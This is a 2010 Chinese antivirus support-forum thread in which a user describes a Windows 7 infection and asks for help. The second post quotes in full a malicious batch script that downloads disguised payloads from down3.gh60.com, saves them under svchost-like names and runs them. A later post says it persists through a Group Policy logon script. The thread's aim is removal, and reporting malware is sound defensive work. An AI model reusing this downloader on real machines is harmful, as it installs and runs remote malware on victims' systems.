1   1  /  1  页   跳转

开机后有个问题 还有这几个文件杀不出来

收藏
小剑师2
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-04-10
  • 来自:
发表于: 2010-08-21 22:02 | 只看楼主 短消息 资料
字号: 1楼

开机后有个问题 还有这几个文件杀不出来

机器最近中了什么病毒 开机后资源管理器中查看 会有cmd.exe conhost.exe ping.exe 结束cmd后就都没了
系统是;WINDOWS7
我原来用360杀毒扫也没提示出什么来
今天换了瑞星2011测试版 升级后也没扫出什么问题来
但装了2011后,我开机马上点资源管理器会假死 卡住大概1分钟又恢复了 右下角第一次提示了个资源管理器对瑞星什么限制 后来就不出这个了 但是点资源管理器还是会假死1分钟左右
晚上我仔细看了下 那个cmd.exe 是在windws/INF/SYS.BAT调用的 ping.exe 地址是www.google.com
我一般都是结束这些后才开始拨号的,我注意了下 直接拨号之后 ping通之后马上变成了一个下载 这时候瑞星就提示木马了


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQPinyinSetup 614; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
分享到:
gototop
 
小剑师2
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-04-10
  • 来自:
发表于: 2010-08-21 22:03 | 只看楼主 短消息 资料
字号: 2楼

回复:开机后有个问题 还有这几个文件杀不出来

sys.bat 还有几个vbs文件 bat里是这么写的:
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping www.google.com &&Goto ok   
Goto End
:ok
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201001.swf %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\inf\shijian.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201002.swf %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\inf\shijian.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201003.swf %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\inf\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201004.swf %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\inf\shijian.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201005.swf %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\inf\shijian.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201006.swf %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201007.swf %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\inf\shijian.vbs
:Next
%SystemRoot%\inf\donw.vbs http://down3.gh60.com/xinde/uploadfile/swf/2010-09/20100000201008.swf %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\inf\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs

Exit
:End
ping www.google.com &&Goto ok
Goto End
gototop
 
小剑师2
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-04-10
  • 来自:
发表于: 2010-08-21 22:17 | 只看楼主 短消息 资料
字号: 3楼

回复:开机后有个问题 还有这几个文件杀不出来

把那个东西删了后 开始就弹出来一个找不到那个东西 看了下地址是
C:\windows\system32\GroupPolicy\User\Scripts\Logon
gototop
 
tyryrtytry
头像
在线工程师
  • 帖子:1545
  • 注册: 2009-06-23
  • 来自:
发表于: 2010-08-23 08:55 | 短消息 资料
字号: 4楼

回复:开机后有个问题 还有这几个文件杀不出来

您的问题已经提交,十分感谢您的支持。
gototop
 
瑞星工程师13
头像
在线技术支持工程师
  • 帖子:1297
  • 注册: 2008-09-08
  • 来自:
发表于: 2010-08-23 10:23 | 短消息 资料
字号: 5楼

回复 1F 小剑师2 的帖子

请跟帖上传瑞星2011无法查杀的文件,并提供瑞星病毒库版本。
最后编辑瑞星工程师13 最后编辑于 2010-08-23 10:24:16
优秀的杀毒软件,是不断创新,不断进步的。
                                  ——瑞星
gototop
 
dxpxqx
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2010-09-10
  • 来自:
发表于: 2010-09-10 03:22 | 短消息 资料
字号: 6楼

回复:开机后有个问题 还有这几个文件杀不出来

我也有相同的问题
gototop
 
abcnet
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2010-09-11
  • 来自:
发表于: 2010-09-11 21:24 | 短消息 资料
字号: 7楼

回复:开机后有个问题 还有这几个文件杀不出来

这个病毒好像是安装MAXDOS时产生的,我安装前都是好的,安装后就产生了这几个文件。
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT